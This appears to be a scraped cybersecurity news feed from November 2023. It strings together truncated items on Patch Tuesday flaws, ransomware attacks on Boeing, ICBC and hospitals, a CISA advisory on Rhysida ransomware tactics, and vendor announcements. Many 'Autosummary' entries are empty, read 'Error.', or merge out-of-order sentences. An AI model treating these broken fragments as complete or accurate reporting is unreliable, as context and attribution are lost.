Windows SmartScreen Security Feature Bypass Vulnerability CVE-2023-36033 (CVSS score: 7.8) - Windows DWM Core Library Elevation of Privilege Vulnerability (CVSS score: 7.8) - Windows DWM Core Library Elevation of Privilege Vulnerability CVE-2023-36036 (CVSS score: 7.8) - Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (CVSS score: 7.8) - Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability CVE-2023-36038 (CVSS score: 8.2) - ASP.NET Core Denial of Service Vulnerability (CVSS score: 8.2) - ASP.NET Core Denial of Service Vulnerability CVE-2023-36413 (CVSS score: 6.5) - Microsoft Office Security Feature Bypass Vulnerability Both CVE-2023-36033 and CVE-2023-36036 could be exploited by an attacker to gain SYSTEM privileges, while CVE-2023-36025 could make it possible to bypass Windows Defender SmartScreen checks and their associated prompts. "ThreatModeler released ThreatModeler, Version 7.0, bringing several new capabilities, including ThreatModeler WingMan (AI assistant), to help streamline the threat modeling process for software security and DevOps teams. ThreatModeler 7.0 enables faster and more consistent threat modeling with features such as intelligent embedded machine learning and AI, increased real-time collaboration, customizable risk analysis and a raft of enterprise-grade features for organizations with complex multi-tier environments and large developer and security teams. Introducing ThreatModeler WingMan. Key patented … More
The post ThreatModeler 7.0 brings AI to threat modeling appeared first on Help Net Security.
"Autosummary:
Together, the ThreatModeler platform, IaC-Assist, and Cloud Modeler tools allow any organization to collaborate, review, and ensure they have a complete view of their active threat surface — in real-time. "In a significant stride towards fortifying the cybersecurity landscape in the Middle East, Resecurity introduced its Digital Identity Protection (IDP) solution. This strategic move aligns with Resecurity’s commitment to creating a safer digital society and empowering individuals and businesses in the region to counteract cyber threats effectively. Resecurity’s advanced Digital Identity Protection Recognizing the escalating cyber threats in the Middle East, Resecurity’s IDP solution is poised to play a pivotal role in safeguarding the digital … More
The post Resecurity enhances cybersecurity in the Middle East appeared first on Help Net Security.
"Autosummary:
"Radiant Security announced the successful closure of a $15 million Series A funding round. This strategic financing, led by Next47, reaffirms the soaring demand for AI-based solutions that address the longstanding challenges faced by Security Operations Centers (SOCs). In addition to Next47, the funding round included participation from all previous investors, including Lightspeed Venture Partners, Acrew Capital, Uncorrelated Ventures, and Jibe Ventures. In addition, the company’s Series A welcomes a new investor, General Advance. “This … More
The post Radiant Security raises $15 million to expand engineering and go-to-market capacity appeared first on Help Net Security.
"Autosummary:
“By integrating Radiant’s AI-powered SOC co-pilot into our internal SOC, RFA is now leveraging AI to provide unmatched security outcomes in terms of capacity, speed, and accuracy,” remarked Grigory Mils, CIO of RFA. "Autosummary:
"Keysight Technologies has introduced a first in its class advancement in network testing with the new Keysight Elastic Network Generator (KENG) software – an agile, composable network test platform based on open vendor-neutral API and designed for continuous integration (CI). While traditional networking environments often rely on proprietary testing solutions, closed test systems create challenges for engineers and network architects since they operate in isolation, lack interoperability, and flexibility. This lack of compatibility makes it … More
The post Keysight Elastic Network Generator facilitates collaborative and flexible network continuous validation appeared first on Help Net Security.
"Autosummary:
Its open, disaggregated and API-first design has been field tested and proven to be ideal for modern DevOps,” Ram Periakaruppan, VP and GM, Network Test & Security Solutions, Keysight, concluded. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Since it surfaced, the Russian-speaking ransomware gang has breached and extorted a wide range of high-profile victims, including the American Dental Association, Sobeys, Knauf, Yellow Pages Canada, UK outsourcing company Capita, the Rheinmetall German defense contractor, and most recently, U.S. government contractor ABB. "Autosummary:
"Autosummary:
"Autosummary:
Known ransomware attacks by ransomware group, October 2023 Known ransomware attacks by country, October 2023 Known ransomware attacks by industry sector, October 2023 In other October news, Resilience, a cyber insurance company, reported that 48% of all MOVEit cyberattack victims in its client base during the first half of 2023 were from the education sector.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Major stories for the month included the takedown of several high-profile groups, including alleged Sony Systems attacker RansomedVC, new data shedding light on Cl0p’s education sector bias, and a deep-dive revealing the danger of the group behind September’s infamous casino attacks. Last month three major ransomware groups—RansomedVC, Ragnar, and Trigona—were shut down, the first two by law enforcement and the third by Ukrainian hacktivists. "Autosummary:
Adobe has released security updates to address vulnerabilities affecting multiple Adobe products: APSB23-52: Adobe ColdFusion APSB23-53: Adobe RoboHelp Server APSB23-54: Adobe Acrobat and Reader APSB23-55: Adobe InDesign APSB23-56: Adobe Photoshop APSB23-57: Adobe Bridge APSB23-58: Adobe FrameMaker Publishing Server APSB23-60: Adobe InCopy APSB23-61: Adobe Animate APSB23-62: Adobe Dimension APSB23-63: Adobe Media Encoder APSB23-64: Adobe Audition APSB23-65: Adobe Premiere Pro APSB23-66: Adobe After Effects Android’s November updates were released by Google.The zero-days patched in these updates are listed as: CVE-2023-36025: a Windows SmartScreen security feature bypass vulnerability that would allow an attacker to bypass Windows Defender SmartScreen checks and their associated prompts. "Autosummary:
"Autosummary:
"In this article, we’ve curated a list of insightful corporate cybersecurity blogs that provide analysis and actionable advice to help you keep your company’s digital assets secure. This list is not meant to be exhaustive since thousands of companies have infosec blogs, so presented here are the ones that we read regularly. AWS Security Amazon Web Services (AWS) is a broadly adopted cloud, offering over 200 featured services from data centers globally. AT&T Cybersecurity AT&T … More
The post 10 corporate cybersecurity blogs worth your time appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security interview, Marko Gulan, Cyber Security Consultant at Schneider Electric, discusses the complexities of safeguarding industrial control systems (ICS). Our conversation will explore the importance of cross-departmental collaboration, balancing security with system functionality, and the dynamic nature of security measures that evolve with emerging threats. We’ll also look at the critical synergy between IT and OT departments and the role of the IEC 62443 standards in staying ahead in the threat … More
The post Collaborative strategies are key to enhanced ICS security appeared first on Help Net Security.
"Autosummary:
The IT department is usually responsible for managing computer systems, networks, and data, while the OT department manages operating systems, industrial control systems, and sensors. In addition, the IEC 62443 standard also promotes cooperation between various stakeholders, including manufacturers, operators, system integrators and security professionals.In this Help Net Security interview, Marko Gulan, Cyber Security Consultant at Schneider Electric, discusses the complexities of safeguarding industrial control systems (ICS).This includes the application of technical security controls, such as firewalls, antivirus programs, encryption, and access controls. "Autosummary:
"Defendants distribute links to their malware through social media posts, ads (i.e., sponsored posts), and pages, each of which purport to offer downloadable versions of Bard or other Google AI products," the company alleged in its complaint. "6clicks announced that it has added SEC Form 8-K content required for event tracking to its incident management module in its GRC platform to help organizations meet new SEC disclosure requirements for qualified cybersecurity events. The new content support empowers organizations to gather relevant incident details and provide a centralized, single source of truth while enabling tracking through the required steps when a qualifying event occurs. Using these details, the platform makes it easy to … More
The post 6clicks helps organizations manage and report on material cybersecurity events appeared first on Help Net Security.
"Autosummary:
The new SEC reporting requirements are now included for filings including Forms 8-K, 10-K, and 20-F. Companies must provide details of cybersecurity events and disclose an incident’s nature, scope, and timing, as well as its material impact or reasonably likely material impact on the company. "Autosummary:
Ongoing discovery, monitoring, and analysis of your external exposure, including domains, websites, hosts, services, etc. : Ongoing discovery, monitoring, and analysis of your external exposure, including domains, websites, hosts, services, etc.It proactively scouts for vulnerabilities, irregularities, misconfigurations, and potential threats, ensuring swift detection and response. "Autosummary:
"Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities. Resecurity, Inc. (USA) protecting major Fortune 100 and government agencies globally has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware […]
The post Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024 appeared first on Security Affairs.
"Autosummary:
Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024 Pierluigi Paganini November 14, 2023 November 14, 2023 Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities. "DirectDefense launched ThreatAdvisor 3.0, its proprietary security orchestration, automation and response (SOAR) platform. Designed to improve the speed, efficiency, and accuracy of DirectDefense’s Security Operations Center (SOC), ThreatAdvisor 3.0 offers continuous security monitoring and management, automates manual processes, and includes an extensive knowledge base for compliance, security events and mitigation techniques. Together with DirectDefense’s white glove approach, ThreatAdvisor is customized for each client based on its unique needs. “The volume and velocity of security threats … More
The post DirectDefense ThreatAdvisor 3.0 offers continuous security monitoring and management appeared first on Help Net Security.
"Autosummary:
Designed to improve the speed, efficiency, and accuracy of DirectDefense’s Security Operations Center (SOC), ThreatAdvisor 3.0 offers continuous security monitoring and management, automates manual processes, and includes an extensive knowledge base for compliance, security events and mitigation techniques. "Autosummary:
"Autosummary:
"Autosummary:
The majority of the servers, 3,133, are in the U.S., followed by 1,228 in Germany, 733 in China, 558 in the U.K., 381 in Australia, 309 in Canada, 301 in France, 277 in Italy, 252 in Spain, 244 in the Netherlands, and 215 in Switzerland. "Autosummary:
The number of bugs in each vulnerability category is listed below: 16 Elevation of Privilege Vulnerabilities 6 Security Feature Bypass Vulnerabilities 15 Remote Code Execution Vulnerabilities 6 Information Disclosure Vulnerabilities 5 Denial of Service Vulnerabilities 11 Spoofing Vulnerabilities The total count of 58 flaws does not include 5 Mariner security updates and 20 Microsoft Edge security updates released earlier this month. "Autosummary:
"The Danish energy sector has suffered what is believed to be the most extensive cyberattack in Danish history, according to SektorCERT. Danish energy sector under attack SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks. From this vantage point, in May 2023, they detected three waves of attacks targeting companies in … More
The post Danish energy sector hit by a wave of coordinated cyberattacks appeared first on Help Net Security.
"Autosummary:
Danish energy sector under attack SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks. "Autosummary:
SEV-SNP, which incorporates Secure Nested Paging (SNP), adds "strong memory integrity protection to help prevent malicious hypervisor-based attacks like data replay, memory re-mapping, and more in order to create an isolated execution environment," according to AMD. "Autosummary:
"Patch Tuesday security updates for November 2023 fixed three vulnerabilities actively exploited in the wild. Microsoft Patch Tuesday security updates for November 2023 addressed 63 new vulnerabilities in Microsoft Windows and Windows Components; Exchange Server; Office and Office Components; ASP.NET and .NET Framework; Azure; Mariner; Microsoft Edge (Chromium-based), Visual Studio, and Windows Hyper-V. Three vulnerabilities […]
The post Microsoft Patch Tuesday security updates fixed 3 actively exploited flaws appeared first on Security Affairs.
"Autosummary:
Microsoft Patch Tuesday security updates for November 2023 addressed 63 new vulnerabilities in Microsoft Windows and Windows Components; Exchange Server; Office and Office Components; ASP.NET and .NET Framework; Azure; Mariner; Microsoft Edge (Chromium-based), Visual Studio, and Windows Hyper-V. Three vulnerabilities addressed by the IT giant are are rated Critical, 56 are rated Important, and four are rated Moderate in severity. "Autosummary:
"Autosummary:
"Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Autosummary:
Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC. Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators. In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Keep all operating systems, software, and firmware up to date.FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3] Living off the Land Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. RESOURCES REPORTING FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Overview Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. VALIDATE SECURITY CONTROLS In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go.Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model.[T1069.002] [T1069.002] net localgroup administrators [T1069.001] Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Table 10: Defense Evasion Technique Title ID Use Indicator Removal: Clear Windows Event Logs T1070.001 Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs. Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. "Autosummary:
The experience is divided into four adventures that introduce fundamental cybersecurity concepts in a simple and intuitive manner Google Interland Its primary goal is to empower participants, especially young ones, to avoid online traps, recognize safe behavior on social media platforms, manage passwords effectively, recognize bullies and predators, and understand responsible data sharing. OverTheWire Popular games include Bandit, Narnia, and Natasha, each focusing on specific aspects of cybersecurity, such as vulnerability scanning, network traffic analysis, and password cracking. "To maintain a competitive edge, modern organizations are evolving toward highly scalable, flexible and resilient applications – leading to the widespread adoption of cloud native technologies like Kubernetes, according to Venafi. Security challenges in cloud native environments In fact, 84% of security and IT leaders believe that Kubernetes will soon be the main platform used to develop all applications. However, amid the rush to transition to these modern environments, many development teams are putting security … More
The post Kubernetes adoption creates new cybersecurity challenges appeared first on Help Net Security.
"Autosummary:
However, the actual implementation of security tools, governance, and policies are split among development, security, and platform teams, with a slight majority going to the development teams (41%). "In this Help Net Security interview, Sumedh Thakar, President and CEO of Qualys explores the vision behind the Qualys Enterprise TruRisk Platform, a strategic move aimed at redefining how enterprises measure, communicate, and eliminate cyber risk. We delve into how Qualys assists CISOs in the complex balancing act of managing critical issues under budget constraints, the financial implications of cyber risk, and the advanced capabilities of the TruRisk Platform in providing a unified view of … More
The post Cyber risk is business risk: Qualys Enterprise TruRisk Platform sets new industry standard appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Sumedh Thakar, President and CEO of Qualys explores the vision behind the Qualys Enterprise TruRisk Platform, a strategic move aimed at redefining how enterprises measure, communicate, and eliminate cyber risk.However, as cyber risk has become a dominant contributor to any organizations’ overall risk posture, de-risking a business from cyber risk has become a central focus of executive stakeholders, from the CEO to the board of directors. Today, nearly every business is a software business, relying on software to run core operations, which makes them susceptible to elevated cyber risk and breaches. "A swing and a miss by the 50 member countries of the International Counter Ransomware Initiative (CRI), headlined by the US, who have confirmed a commitment to collectively address ransomware. Ransomware, as predicted, is growing at tremendous rates and focusing on critical infrastructure sectors that can impact vast numbers of citizens. It is such a blight that countries are banding together to see what can be done. Everybody is looking towards the United States for … More
The post Success eludes the International Counter Ransomware Initiative appeared first on Help Net Security.
"Autosummary:
The CRI recognizes that paying attackers only makes them stronger and incentivizes them to attack more, while severing payments, no matter how painful, weakens and greatly discourages attackers, and will ultimately grind their attacks down to insignificance. "With each step towards digitalization, from cloud computing to electronic records, the healthcare sector faces mounting risks that threaten not just the privacy but the very wellbeing of patients. In this Help Net Security interview, Taylor Lehmann, Director, Office of the CISO, Google Cloud, discusses the critical conversation surrounding the ethical and legal responsibilities that healthcare providers must navigate in the wake of a data breach. He explores the severe implications of cyber threats that … More
The post The real cost of healthcare cybersecurity breaches appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Taylor Lehmann, Director, Office of the CISO, Google Cloud, discusses the critical conversation surrounding the ethical and legal responsibilities that healthcare providers must navigate in the wake of a data breach.In June, St. Margaret’s Health, the only hospital in the small, rural community of Spring Valley, Illinois, permanently closed its doors, in part because of the insurmountable costs to restore hospital services following a 2021 ransomware attack.To put an end to the growing, existential threat that healthcare faces, it will take creativity, innovation, partnership, and a willingness to change the current state of IT security and risk management in healthcare.Many new laws and regulations are being proposed to address some of the concerns voiced by the healthcare security community, including those that seek to increase the amount of security threat intelligence that is being shared, drive adoption of new security models like zero trust, improve the security of supply chains for software and data, and others.Lawsuits from breach victims seeking damages for medical identity theft, financial losses, potential loss of life, and emotional distress can also have a substantial legal, financial, and reputational impact. "Autosummary:
To that end, eight individuals aged between 29 and 56, including the syndicate"s mastermind, have been arrested across different locations in Sabah, Selangor, Perak, and Kuala Lumpur, New Straits Times reported. "Autosummary:
"It appears that the leadership of the Hive group made the strategic decision to cease their operations and transfer their remaining assets to another group, Hunters International," Martin Zugec, technical solutions director at Bitdefender, said in a report published last week. "Autosummary:
BiBi"s commands stored in reverse writing order to evade detection (BlackBerry) BiBi for Windows targets all file types except for .EXE, .DLL, and .SYS files, likely because destroying them would render the computer unusable, and the hacktivists wouldn"t be able to relay their message. "Impinj announced the Impinj R720 RAIN RFID reader. With more processing power and memory than Impinj’s prior-generation reader, the Impinj R720 speeds edge processing and reduces network load and latency, allowing on-reader applications to meet the most demanding requirements of large-scale enterprise deployments. “Enterprises see increasing demand for reliable, real-time data about every item they manufacture, transport and sell,” said Jeff Dossett, Impinj CRO. “The Impinj R720 reader delivers powerful edge processing to support application … More
The post Impinj R720 reader optimizes speed and automation in supply chain and logistics appeared first on Help Net Security.
"Autosummary:
The Impinj R720 reader further advances the proven Impinj platform, an end-to-end RAIN RFID platform with tag chips, reader chips, readers, software, testing solutions, services, and a global partner ecosystem. "Network Perception announced a technology integration with Claroty to provide OT network auditors with a comprehensive, independent audit platform to track and verify system changes and enhance network visibility. The combined technology enables auditors to establish an accurate baseline view of network architecture and cybersecurity posture. This information can then be used to set up continuous monitoring that enables immediate response and adaptation to disruptions. Network assessment automation is fundamental to cyber resiliency best practices, … More
The post Network Perception integrates technology with Claroty to boost OT cybersecurity for organizations appeared first on Help Net Security.
"Autosummary:
"The LockBit ransomware group published data allegedly stolen from the aerospace giant Boeing in a recent attack. The Boeing Company, commonly known as Boeing, is one of the world’s largest aerospace manufacturers and defense contractors. In 2022, Boeing recorded $66.61 billion in sales, the aerospace giant has 156,000 (2022). At the end of October, the Lockbit ransomware […]
The post LockBit ransomware gang leaked data stolen from Boeing appeared first on Security Affairs.
"Autosummary:
LockBit ransomware gang leaked data stolen from Boeing Pierluigi Paganini November 13, 2023 November 13, 2023 The LockBit ransomware group published data allegedly stolen from the aerospace giant Boeing in a recent attack. "Autosummary:
"Autosummary:
During these attacks, when targets dial the phone numbers embedded in emails cleverly disguised as subscription renewals, the attackers leverage social engineering tactics to trick the victims into installing remote access software, granting them access to the targeted network. "Autosummary:
Error. "Autosummary:
Error. "US CISA added four vulnerabilities (tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847) in Juniper devices to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new vulnerabilities to its Known Exploited Vulnerabilities catalog, five issues impacting Juniper Junos OS and one impacting the SysAid SysAid IT support software. Below is the list […]
The post CISA adds five vulnerabilities in Juniper devices to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Below is the list of the added vulnerabilities: CVE-2023-47246 SysAid Server Path Traversal Vulnerability CVE-2023-36844 Juniper Junos OS EX Series PHP External Variable Modification Vulnerability CVE-2023-36845 Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability CVE-2023-36846 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability CVE-2023-36847 Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability CVE-2023-36851 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability According to Juniper SIRT, the vulnerabilities in J-Web can be combined to allow an attacker to achieve preAuth Remote Code Execution.CISA adds five vulnerabilities in Juniper devices to its Known Exploited Vulnerabilities catalog Pierluigi Paganini November 13, 2023 November 13, 2023 US CISA added four vulnerabilities (tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847) in Juniper devices to its Known Exploited Vulnerabilities catalog. Juniper addressed four medium-severity (CVSS 5.3) vulnerabilities (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847) in In mid-August. "Autosummary:
For what we can gather, the cybercriminals may have obtained names, Social Security numbers (SSN), dates of birth, driver’s licenses, state identification numbers, and taxpayer identification numbers. "Autosummary:
It is a threat actor linked to the Islamic Revolutionary Guard Corps (IRGC), a branch of the Iranian Armed Forces, and has been active since at least 2017 carrying out cyberattacks against organizations in various sectors, including defense, technology, telecommunications, maritime, energy, and consulting and professional services. "The State of Maine disclosed a data breach that impacted about 1.3 million people after an attack hit its MOVEit file transfer install. The State of Maine was the victim of the large-scale hacking campaign that targeted organizations using the MOVEit file transfer tool. The Government organization disclosed a data breach that impacted about 1.3 million individuals. Threat actors […]
The post The State of Maine disclosed a data breach that impacted 1.3M people appeared first on Security Affairs.
"Autosummary:
Below is the list of organizations with the highest number of impacted individuals: Organization Individuals Maximus 11 million Pôle emploi 10 million Louisiana Office of Motor Vehicles 6 million Colorado Department of Health Care Policy and Financing 4 million Oregon Department of Transportation 3.5 million Teachers Insurance and Annuity Association of America 2.6 million Genworth 2.5 million PH Tech 1.7 million Milliman Solutions 1.2 million Wilton Reassurance Company 1.2 million “U.S.-based organizations account for 83.9 percent of known victims, Germany-based 3.6 percent, Canada-based 2.6 percent, and U.K.-based 2.1 percent.” The data is sourced from state breach notifications, SEC filings, and other public disclosures, as well as the leak site maintained by the Cl0p group, and is current as of August 25, 2023. "Autosummary:
Boeing page on LockBit data leak site source: BleepingComputer Boeing disappeared from LockBit’s list of victims for a period but was listed again on November 7, when the hackers announced that their warnings had been ignored. "The Lorenz extortion group leaked the data stolen from the Texas-based Cogdell Memorial Hospital. In early November, the Cogdell Memorial Hospital (Scurry County Hospital District) announced it was experiencing a computer network incident that prevented the hospital from accessing some of its systems and severely limiting the operability of its phone system. The hospital immediately […]
The post The Lorenz ransomware group hit Texas-based Cogdell Memorial Hospital appeared first on Security Affairs.
"Autosummary:
It is a 70-bed hospital that provides a wide range of services, including: Emergency care Inpatient and outpatient surgery Medical imaging Laboratory services Physical therapy Occupational therapy Speech therapy Home health care Hospice care The Lorenz extortion group claimed responsibility for the security breach and added the hospital to its Tor leak site.The Lorenz ransomware group hit Texas-based Cogdell Memorial Hospital Pierluigi Paganini November 12, 2023 November 12, 2023 The Lorenz extortion group leaked the data stolen from the Texas-based Cogdell Memorial Hospital. "The Royal Malaysian Police announced the seizure of the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. The Royal Malaysian Police announced to have dismantled the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. A joint international operation conducted by the Malaysian police, the FBI, and the Australian Federal Police took down several domains employed in the cybercriminal operation. “We seized around RM960,000 […]
The post Police seized BulletProftLink phishing-as-a-service (PhaaS) platform appeared first on Security Affairs.
"Autosummary:
Police seized BulletProftLink phishing-as-a-service (PhaaS) platform Pierluigi Paganini November 11, 2023 November 11, 2023 The Royal Malaysian Police announced the seizure of the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. "Autosummary:
PhaaS platforms provide cybercriminals with tools and resources to carry out phishing attacks through “ready-to-use” kits and templates, page hosting, customization options, credential harvesting, and reverse proxying tools. "Autosummary:
In February, the company had previously addressed a similar bug affecting Office Suite apps, such as Word, Excel, and PowerPoint. "“We brought a shovel to fight an avalanche.” That’s the sentiment shared by many business leaders, especially CISOs, CIOs and IT leaders as they face the current cybersecurity threat landscape. Like an avalanche, it’s constantly shifting and changing, moving quickly and unpredictably. With the prevalence of remote and hybrid work models, leaders are having an even harder time protecting all their IT assets. That’s because – to extend this metaphor – the IT assets that … More
The post How to withstand the onslaught of cybersecurity threats appeared first on Help Net Security.
"Autosummary:
How to identify the right cybersecurity tools for 2023 and beyond The right cybersecurity platform is scalable, user-friendly, easy to deploy and manage, and highly secure. One of the best, if not only, ways to achieve this is to adopt a dynamic, scalable solution that is fully integrated with your UEM solution and has been built with security in mind from the ground up. Why you should consolidate your cybersecurity platform Another key cybersecurity trend for 2023 and beyond, according to Gartner: cybersecurity platform consolidation. "Autosummary:
"Autosummary:
For instance, owners of cryptocurrency wallets might take screenshots of their wallet"s account recovery phrases - crucial information if you ever lose access to a wallet if a password, for instance, is forgotten. Of course, in future attacks they could always use other disguises to camouflage their intentions - and even if they struggle to get a poisoned app into the Google Play store again, they could use social engineering to trick unwary Android users into downloading it from third-party sites. Well, imagine you have sensitive information - such as details related to your cryptocurrency wallet - in your Android phone"s photo gallery. "The state-owned Industrial and Commercial Bank of China (ICBC), which is one of the largest banks in the world, has been hit by a ransomware attack that led to disrupted trades in the US Treasury market. The attack “On November 8, 2023, U.S. Eastern Time (November 9, 2023, Beijing Time), ICBC Financial Services (FS) experienced a ransomware attack that resulted in disruption to certain FS systems. Immediately upon discovering the incident, ICBC FS disconnected and … More
The post Chinese multinational bank hit by ransomware appeared first on Help Net Security.
"Autosummary:
"The Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack that disrupted trades in the US Treasury market. The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions “The Securities Industry and Financial Markets […]
The post Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions “The Securities Industry and Financial Markets Association first told members on Wednesday that ICBC Financial Services had been hit by ransomware software, which paralyses computer systems unless a payment is made, several people familiar with the discussions said.” reported the Financial Times. "Microsoft spotted the exploitation of a SysAid zero-day vulnerability in limited attacks carried out by the Lace Tempest group. Microsoft reported the exploitation of a zero-day vulnerability, tracked as CVE-2023-47246, in the SysAid IT support software in limited attacks. The IT giant linked the attacks to the Clop ransomware gang (aka Lace Tempest). The company reported the flaw […]
The post SysAid zero-day exploited by Clop ransomware group appeared first on Security Affairs.
"Autosummary:
SysAid zero-day exploited by Clop ransomware group Pierluigi Paganini November 10, 2023 November 10, 2023 Microsoft spotted the exploitation of a SysAid zero-day vulnerability in limited attacks carried out by the Lace Tempest group. "Autosummary:
"Autosummary:
Evidence shows that on August 31 an unauthorized threat actor had accessed data and the following data types were confirmed to have been exposed by October 10: Full name Social Security number (SSN) Health insurance information Date of birth Billing or claims information Diagnosis Physician information Medical record number Medicare/Medicaid information Prescription/medication information Diagnostic results and treatment information The specific types of data exposed differ for each individual, depending on the information they shared with the organization and the services they received. "Autosummary:
Tools, such as Specops Password Policy enables IT teams to set stringent password protocols, from meeting compliance standards, setting length and complexity requirements, to ensuring the absence of common and weak terms, as well as blocking known compromised passwords, which significantly tightens access controls. It lays out five core rules – the Privacy Rule, the Security Rule, the Breach Notification Rule, the Enforcement Rule, and the Patient Safety Rule. It spanned a range of sensitive information, including names, addresses, Social Security numbers, and more. "Autosummary:
Yet, as of November 9 2023, YouTube was still showing an ad for Total Adblock, a browser extension that blocks… ads. "Autosummary:
"Autosummary:
"McLaren Health Care (McLaren) experienced a data breach that compromised the sensitive personal information of approximately 2.2 million individuals. McLaren Health Care (McLaren) disclosed a data breach that occurred between late July and August. The security breach exposed the sensitive personal information of 2,192,515 people. McLaren Health Care is a nonprofit health care organization based in […]
The post McLaren Health Care revealed that a data breach impacted 2.2 million people appeared first on Security Affairs.
"Autosummary:
